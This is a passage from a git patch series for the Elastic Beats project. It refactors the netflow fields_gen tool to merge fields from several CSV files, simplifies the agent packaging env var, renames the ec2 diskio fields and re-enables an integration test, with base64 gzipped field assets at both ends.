R9cjeABi6xI8wkn1CSYSVKL+BYqQsD+AJyTuD7AgE/gHGdCJ/O8seyT0X7Lt9Mg6J8H/gmOH4IY9Ev4/ctH96HsUAIhzZWiT3QoCPGPcpY07Nm7HVuVvCjsUDlhyZZtf9i0ksGbNLCjwQJhZWOAZG+0EmV1oYIMoo0W7rKFdVs8+62afFbNHrhJagYIJnVmo4M5Dzs06UeTlaA3R7LM+KTlbQ+CgheTpDJEzrI5wYqbVRzgt+lWfipevXz+xP4R1F+MM+86KiWzdeWCi23a0vQdMUsxfDm/gvfM5CSPL7ql8bLzUf/L5EdmoEt30EUu7TI9ozWWpGupr4emhcPzVa0ovHEP/hjqzGX3wAOm98sSR24ZhX9qJxnUG+3jgzqHarqY8Eb0zaHWMpW58pvcmEsLbxl3esq+fsaOb4ZVSbk6PMahwME6WsX3guaLJDHXsn1f2CVMHnYfeTvd46D5x0L8uxseBvWF0LAy8E934DjWbrn2zOzbOs+W2jbhfgPFB56SYPdPwus7x4+XepOZ4QprTNZwYAJB7kZvjs/qRmal1j1vTTpYAo4usPHTG8gy5sjxzECyXJdelr9c2FubIy08foMxNXWZuxkLjnVjZjl1btIwXbxn39oFBqmsNZTW8BabcmB3ReM09kp7GOob5DZcmwv5dpZCZQ5L1Fs8R0N4zOWRrzpmN1ybHkuMYnt3iEhh6hUSfQ3PLncNOV/kMbj14dwflLus4rkKW7h5V8JpgLZkzkBxd81hrYhaN+6aSa/WcbU+5VkvbSQl1lhu6K/fQN45lfINB3RIcR9aC6aR3LFCflHdtm/NeytfCop2EfcogH+jocyN6T2y4bOaTLlyEtl0ffX/f+P37csq7lDgbsZsPfPuwdB2pb1Tb+kWzE63hV/fJ4sz9ksUb9jzcGEpnr7YlninzDb35Bt5swy7VoJtjyMUbcCmGW5rBNs9QSzfQZhlmcwyyVENspgE2x/BKN7hmGVopBtYswyrdoJpnSM02oFINpzkG0xxDKd5AupNhdCeD6D6G0H0MoETD51gkA4simEmNqN8Yb4eoHYSUUM2qVHMq0YyabT6lmk2J5tJsM2mOeTTTLBqEm8gtKc5CNKoaU/uKAMyAFryOHcTinZ/wopLcdhqz9EbsVPFRKsv4KWQGQZIc4aRoTcGlJRpxQ0EFnxMV+VXRoh7eeUwtQNLaqppWDxoPdwd2aHX8A4rIq6XNBg/AcO7eTWTbHWtRsDe4bezKqQwRnbAJHyqXR6YpvqgGHHIzorg2yC6NHV0ZeBdGTMxQjouS28Apm+6wyHZU0B0UeY4JukOC7IjAOyDojge6w4HuaCA7GOiOBbpDIceRQHcgkB0HFpq2dvslxkRoT9YJeQ04nephQatPHCIaMJY361j8yOiPv78Xy78nbfkVeWXPcKaMB0CMGS7f8bKDwyXD0ZLnYMlxrJAdKkRHCtGBQnCcOAgOke1iuYjWQs19YopkEwrKHxP98D5emDzvS5LXJdYDrK/l0ly5DpRP5NYito2BZZ3Ym0RjQfI+C76NKL3AyTeMDbx2TcPiVvGSYHzLkTxpC/TM3kJo/Mz6QUeTOn/5cLI3pMfTKnB2iHXfL3Psqxe8c/DKuXGH1Eb8yQersE+GmvpFolOR4EwkOxE//EFqvgWO+W9EyxLlac2BE4ceP0gS9fNJgvj/AQAA//9/k9FY" } diff --git a/x-pack/filebeat/input/netflow/fields_gen.go b/x-pack/filebeat/input/netflow/fields_gen.go index 5e41a3087660..66b77283c90b 100644 --- a/x-pack/filebeat/input/netflow/fields_gen.go +++ b/x-pack/filebeat/input/netflow/fields_gen.go @@ -14,17 +14,17 @@ import ( "fmt" "io" "io/ioutil" + "log" "os" + "sort" + "strconv" "strings" "github.com/elastic/beats/v7/x-pack/filebeat/input/netflow" ) var ( - outputFile = flag.String("output", "zfields.go", "Output file") - nameCol = flag.Int("column-name", 0, "Index of column with field name") - typeCol = flag.Int("column-type", 0, "Index of column with field type") - indent = flag.Int("indent", 0, "Number of spaces to indent") + outputFile = flag.String("output", "fields.yml", "Output file") header = flag.String("header", "fields.header.yml", "File with header fields to prepend") ) @@ -53,89 +53,141 @@ var typesToElasticTypes = map[string]string{ "ipv6address": "ip", } -var indentString string - -func makeIndent(n int) (s []byte) { - if n > 0 { - s = make([]byte, n) - for i := 0; i < n; i++ { - s[i] = ' ' - } - } - return s -} - -func write(w io.Writer, msg string) { - for _, line := range strings.Split(msg, "\n") { - writeLine(w, indentString+line+"\n") - } -} - -func writeLine(w io.Writer, line string) { - if n, err := w.Write([]byte(line)); err != nil || n != len(line) { - fmt.Fprintf(os.Stderr, "Failed writing to %s: %v\n", *outputFile, err) - os.Exit(4) - } -} - func usage() { - fmt.Fprintf(os.Stderr, "Usage: fields_gen [-output file.yml] [--column-{name|type}=N]* \n") + fmt.Fprintf(os.Stderr, "Usage: fields_gen [-header=file] [-output=file.yml] [input-csv,name-column,type-column,has-header]+\n") flag.PrintDefaults() os.Exit(1) } -func requireColumn(colFlag *int, argument string) { - if *colFlag <= 0 { - fmt.Fprintf(os.Stderr, "Required argument %s not provided\n", argument) - usage() - } -} - func main() { + log.SetFlags(0) flag.Usage = usage flag.Parse() + if len(flag.Args()) == 0 { - fmt.Fprintf(os.Stderr, "No CSV file to parse provided\n") + fmt.Fprintf(os.Stderr, "No CSV file args to parse provided\n") usage() } - csvFile := flag.Args()[0] - if len(csvFile) == 0 { - fmt.Fprintf(os.Stderr, "Argument -input is required\n") - os.Exit(2) + + if err := generateFieldsYml(flag.Args()); err != nil { + log.Fatal(err) } +} - requireColumn(nameCol, "--column-name") - requireColumn(typeCol, "--column-type") +func generateFieldsYml(args []string) error { + // Parse the arguments containing file path and parsing parameters. + var csvFiles []CSVFile + for _, v := range flag.Args() { + csvFile, err := NewCSVFileFromArg(v) + if err != nil { + return err + } + csvFiles = append(csvFiles, *csvFile) + } - indentString = string(makeIndent(*indent)) + // Read in all the field data. + var allFields []map[string]string + for _, csvFile := range csvFiles { + fields, err := csvFile.ReadFields() + if err != nil { + return err + } + allFields = append(allFields, fields) + } - fHandle, err := os.Open(csvFile) + // Merge fields and resolve conflicts in the data types. + fields, err := mergeFields(allFields...) if err != nil { - fmt.Fprintf(os.Stderr, "Failed to open %s: %v\n", csvFile, err) - os.Exit(2) + return err } - defer fHandle.Close() - outHandle, err := os.Create(*outputFile) - if err != nil { - fmt.Fprintf(os.Stderr, "Failed to create %s: %v\n", *outputFile, err) - os.Exit(3) + // Sort fields alphabetically by name. + type netflowField struct { + Name, Type string } - defer outHandle.Close() + var sortedFields []netflowField + for k, v := range fields { + sortedFields = append(sortedFields, netflowField{k, v}) + } + sort.Slice(sortedFields, func(i, j int) bool { + return sortedFields[i].Name < sortedFields[j].Name + }) headerHandle, err := os.Open(*header) if err != nil { - fmt.Fprintf(os.Stderr, "Failed to open %s: %v\n", *header, err) - os.Exit(2) + return fmt.Errorf("failed to open %s: %v", *header, err) } defer headerHandle.Close() fileHeader, err := ioutil.ReadAll(headerHandle) if err != nil { - fmt.Fprintf(os.Stderr, "Failed to read %s: %v\n", *header, err) - os.Exit(2) + return fmt.Errorf("failed to read header %s: %v", *header, err) } - write(outHandle, string(fileHeader)) + + outHandle, err := os.Create(*outputFile) + if err != nil { + return fmt.Errorf("failed to open %s: %v", *outputFile, err) + } + defer outHandle.Close() + + out := bufio.NewWriter(outHandle) + defer out.Flush() + + // Write output file. + writeLine(out, strings.Repeat("#", 40)) + writeLine(out, "# This file is generated. Do not modify.") + writeLine(out, strings.Repeat("#", 40)) + writeLine(out, string(fileHeader)) + + for _, f := range sortedFields { + writeLine(out, " - name: "+f.Name) + writeLine(out, " type: "+f.Type) + writeLine(out, "") + } + return nil +} + +// CSVFile represents a CSV file with containing netflow field information +// (field name, data type). +type CSVFile struct { + Path string + NameColumn int + TypeColumn int + Header bool +} + +func NewCSVFileFromArg(arg string) (*CSVFile, error) { + r := csv.NewReader(strings.NewReader(arg)) + parts, err := r.Read() + if err != nil { + return nil, fmt.Errorf("failed to parse argument %q: %w", arg, err) + } + if len(parts) != 4 { + return nil, fmt.Errorf("input argument must consist of 4 parts [path,name-column,type-column,header]") + } + + a := &CSVFile{} + a.Path = parts[0] + if a.NameColumn, err = strconv.Atoi(parts[1]); err != nil { + return nil, fmt.Errorf("failed to parse name column %q: %w", parts[1], err) + } + if a.TypeColumn, err = strconv.Atoi(parts[2]); err != nil { + return nil, fmt.Errorf("failed to parse type column %q: %w", parts[2], err) + } + if a.Header, err = strconv.ParseBool(parts[3]); err != nil { + return nil, fmt.Errorf("failed to parse header column %q: %w", parts[3], err) + } + return a, nil +} + +// ReadFields reads the fields contained in the CSV file and returns a map +// of names to Elasticsearch data type. +func (a CSVFile) ReadFields() (map[string]string, error) { + fHandle, err := os.Open(a.Path) + if err != nil { + return nil, fmt.Errorf("failed to open %v: %w", a.Path, err) + } + defer fHandle.Close() filtered := bytes.NewBuffer(nil) scanner := bufio.NewScanner(fHandle) @@ -145,6 +197,11 @@ func main() { filtered.WriteByte('\n') } } + if scanner.Err() != nil { + return nil, fmt.Errorf("failed reading from %v: %w", a.Path, err) + } + + fields := map[string]string{} reader := csv.NewReader(filtered) for lineNum := 1; ; lineNum++ { record, err := reader.Read() @@ -152,22 +209,21 @@ func main() { if err == io.EOF { break } - fmt.Fprintf(os.Stderr, "read of %s failed: %v\n", csvFile, err) - os.Exit(5) + return nil, fmt.Errorf("read of %s failed: %v\n", a.Path, err) } + n := len(record) vars := make(map[string]string) for _, f := range []struct { column int name string }{ - {*nameCol, "name"}, - {*typeCol, "type"}, + {a.NameColumn, "name"}, + {a.TypeColumn, "type"}, } { if f.column > 0 { if f.column > n { - fmt.Fprintf(os.Stderr, "%s column is out of range in line %d\n", f.name, lineNum) - os.Exit(6) + return nil, fmt.Errorf("%s column is out of range in line %d\n", f.name, lineNum) } vars[f.name] = record[f.column-1] } @@ -175,13 +231,49 @@ func main() { if len(vars["type"]) == 0 { continue } + esType, found := typesToElasticTypes[strings.ToLower(vars["type"])] if !found { continue } - write(outHandle, fmt.Sprintf(` - name: %s - type: %s -`, - netflow.CamelCaseToSnakeCase(vars["name"]), esType)) + + fields[netflow.CamelCaseToSnakeCase(vars["name"])] = esType + } + + return fields, nil +} + +func mergeFields(allFields ...map[string]string) (map[string]string, error) { + out := map[string]string{} + for _, fields := range allFields { + for name, esType := range fields { + if existingESType, found := out[name]; found { + var err error + esType, err = resolveConflict(existingESType, esType) + if err != nil { + return nil, fmt.Errorf("field %v: %w", name, err) + } + } + out[name] = esType + } + } + return out, nil +} + +func resolveConflict(a, b string) (string, error) { + if a == b { + // No conflict. + return a, nil + } + if a == "keyword" || b == "keyword" { + // If either is a keyword then use that. + return "keyword", nil + } + return "", fmt.Errorf("cannot resolve type conflict between %v != %v", a, b) +} + +func writeLine(w io.StringWriter, line string) { + if _, err := w.WriteString(line + "\n"); err != nil { + log.Fatalf("Failed writing line: %v", err) } } From 918ebb3f6c9c57f3d26f84727248b54303932a97 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?No=C3=A9mi=20V=C3=A1nyi?= Date: Tue, 16 Feb 2021 16:21:26 +0100 Subject: [PATCH 56/63] Only build targz and zip versions of Beats if PACKAGES is set in agent (#24060) --- x-pack/elastic-agent/magefile.go | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index d64042b7d596..0149e7ea0bd4 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -621,15 +621,7 @@ func selectedPackageTypes() string { return "" } - envVar := "PACKAGES=" - for _, p := range devtools.SelectedPackageTypes { - if p == devtools.Docker { - envVar += "targz," - } else { - envVar += p.String() + "," - } - } - return envVar[:len(envVar)-1] + return "PACKAGES=targz,zip" } func copyAll(from, to string) error { From 685d85cfd12cda7627149c64d2f40948af870b9c Mon Sep 17 00:00:00 2001 From: kaiyan-sheng Date: Tue, 16 Feb 2021 08:29:39 -0700 Subject: [PATCH 57/63] Fix ec2 metricset fields.yml and add integration test (#23726) --- CHANGELOG.next.asciidoc | 1 + metricbeat/docs/fields.asciidoc | 8 ++-- .../module/aws/ec2/_meta/fields.yml | 8 ++-- .../module/aws/ec2/ec2_integration_test.go | 37 +------------------ x-pack/metricbeat/module/aws/fields.go | 2 +- x-pack/metricbeat/module/aws/terraform.tf | 20 ++++++++++ 6 files changed, 31 insertions(+), 45 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 07f4ab5d8624..1b2f752dada7 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -499,6 +499,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] - Add check for iis/application_pool metricset for nil worker process id values. {issue}23605[23605] {pull}23647[23647] +- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] - Unskip s3_request integration test. {pull}23887[23887] - Add system.hostfs configuration option for system module. {pull}23831[23831] diff --git a/metricbeat/docs/fields.asciidoc b/metricbeat/docs/fields.asciidoc index 4af8bbf459f3..d67075d4adc8 100644 --- a/metricbeat/docs/fields.asciidoc +++ b/metricbeat/docs/fields.asciidoc @@ -2326,7 +2326,7 @@ type: scaled_float -- -*`aws.ec2.diskio.read.ops`*:: +*`aws.ec2.diskio.read.count`*:: + -- Total completed read operations from all instance store volumes available to the instance in collection period. @@ -2336,7 +2336,7 @@ type: long -- -*`aws.ec2.diskio.read.ops_per_sec`*:: +*`aws.ec2.diskio.read.count_per_sec`*:: + -- Completed read operations per second from all instance store volumes available to the instance in a specified period of time. @@ -2346,7 +2346,7 @@ type: long -- -*`aws.ec2.diskio.write.ops`*:: +*`aws.ec2.diskio.write.count`*:: + -- Total completed write operations to all instance store volumes available to the instance in collection period. @@ -2356,7 +2356,7 @@ type: long -- -*`aws.ec2.diskio.write.ops_per_sec`*:: +*`aws.ec2.diskio.write.count_per_sec`*:: + -- Completed write operations per second to all instance store volumes available to the instance in a specified period of time. diff --git a/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml b/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml index c7280fce9981..7862ff75ea37 100644 --- a/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml +++ b/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml @@ -76,19 +76,19 @@ type: scaled_float description: > Bytes written per second to all instance store volumes available to the instance. - - name: diskio.read.ops + - name: diskio.read.count type: long description: > Total completed read operations from all instance store volumes available to the instance in collection period. - - name: diskio.read.ops_per_sec + - name: diskio.read.count_per_sec type: long description: > Completed read operations per second from all instance store volumes available to the instance in a specified period of time. - - name: diskio.write.ops + - name: diskio.write.count type: long description: > Total completed write operations to all instance store volumes available to the instance in collection period. - - name: diskio.write.ops_per_sec + - name: diskio.write.count_per_sec type: long description: > Completed write operations per second to all instance store volumes available to the instance in a specified period of time. diff --git a/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go b/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go index 121df878b278..d790140d7e79 100644 --- a/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go +++ b/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go @@ -17,7 +17,6 @@ import ( ) func TestFetch(t *testing.T) { - t.Skip("flaky test: https://github.com/elastic/beats/issues/20951") config := mtest.GetConfigForTest(t, "ec2", "300s") metricSet := mbtest.NewReportingMetricSetV2Error(t, config) @@ -27,41 +26,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - // RootField - mtest.CheckEventField("service.name", "string", event, t) - mtest.CheckEventField("cloud.availability_zone", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.instance.id", "string", event, t) - mtest.CheckEventField("cloud.machine.type", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("instance.image.id", "string", event, t) - mtest.CheckEventField("instance.state.name", "string", event, t) - mtest.CheckEventField("instance.state.code", "int", event, t) - mtest.CheckEventField("instance.monitoring.state", "string", event, t) - mtest.CheckEventField("instance.core.count", "int", event, t) - mtest.CheckEventField("instance.threads_per_core", "int", event, t) - - // MetricSetField - mtest.CheckEventField("cpu.total.pct", "float", event, t) - mtest.CheckEventField("cpu.credit_usage", "float", event, t) - mtest.CheckEventField("cpu.credit_balance", "float", event, t) - mtest.CheckEventField("cpu.surplus_credit_balance", "float", event, t) - mtest.CheckEventField("cpu.surplus_credits_charged", "float", event, t) - mtest.CheckEventField("network.in.packets", "float", event, t) - mtest.CheckEventField("network.out.packets", "float", event, t) - mtest.CheckEventField("network.in.bytes", "float", event, t) - mtest.CheckEventField("network.out.bytes", "float", event, t) - mtest.CheckEventField("diskio.read.bytes", "float", event, t) - mtest.CheckEventField("diskio.write.bytes", "float", event, t) - mtest.CheckEventField("diskio.read.ops", "float", event, t) - mtest.CheckEventField("diskio.write.ops", "float", event, t) - mtest.CheckEventField("status.check_failed", "int", event, t) - mtest.CheckEventField("status.check_failed_system", "int", event, t) - mtest.CheckEventField("status.check_failed_instance", "int", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/fields.go b/x-pack/metricbeat/module/aws/fields.go index 31a766459c73..f63e476ad077 100644 --- a/x-pack/metricbeat/module/aws/fields.go +++ b/x-pack/metricbeat/module/aws/fields.go @@ -19,5 +19,5 @@ func init() { // AssetAws returns asset data. // This is the base64 encoded gzipped contents of module/aws. func AssetAws() string { - return "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